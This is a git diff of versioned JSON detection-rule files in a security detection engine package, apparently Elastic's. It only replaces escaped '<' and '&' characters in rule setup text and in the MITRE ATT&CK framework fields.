a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json 
@@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json index 0f93db731d1..896500f2288 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json 
@@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json index fa01f94bec0..becd03df016 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json index 8361efc491b..703fc128ecb 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json index e35a51e28dd..d5484e3c6c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_1.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json index 4a9b0cc9a81..c24c6f01009 100644 --- a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_2.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json index 1ef9dc81916..3ba866eb0da 100644 --- a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_3.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json index a4af55da1fb..a00dbeb2f7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_103.json 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json index 5c6fc677258..7ef2cd4f5d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_104.json 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json index a484bc3e831..9e22db362f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_105.json 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json index 0ba179162f2..d79bf795c54 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_106.json 
@@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json index 0bb03522761..086e16770ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_104.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json index b2121548743..e82dad0a3cd 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_105.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json index 7f00d16b41c..daba4ddef4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_106.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json index 9f695592ac4..e9c09cecd2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_107.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json index 4780d9ccdf3..25391388ac1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json index 0461f080cb0..080ced962fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json index efe0af6757d..6e558cfde68 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_100.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -75,7 +75,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json index 413e398dc5d..4e4eb4a6b3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json 
+++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_101.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json index 70a7ca9e8b1..ef845481e47 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -71,7 +71,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json index 860f43736f2..d5c8f7eede3 100644 --- a/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8c1bdde8-4204-45c0-9e0c-c85ca3902488_103.json 
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -78,7 +78,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json
index 6b8e27c8ce0..fdd7b6f99e6 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_104.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json
index fe44b5ad254..3a2f56f61d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_105.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json
index 846d839b07a..f49618db0f2 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_106.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json
index 43eaff829d7..3e2dc88d43d 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_107.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json
index 7628328e248..fd2cf2509f6 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json
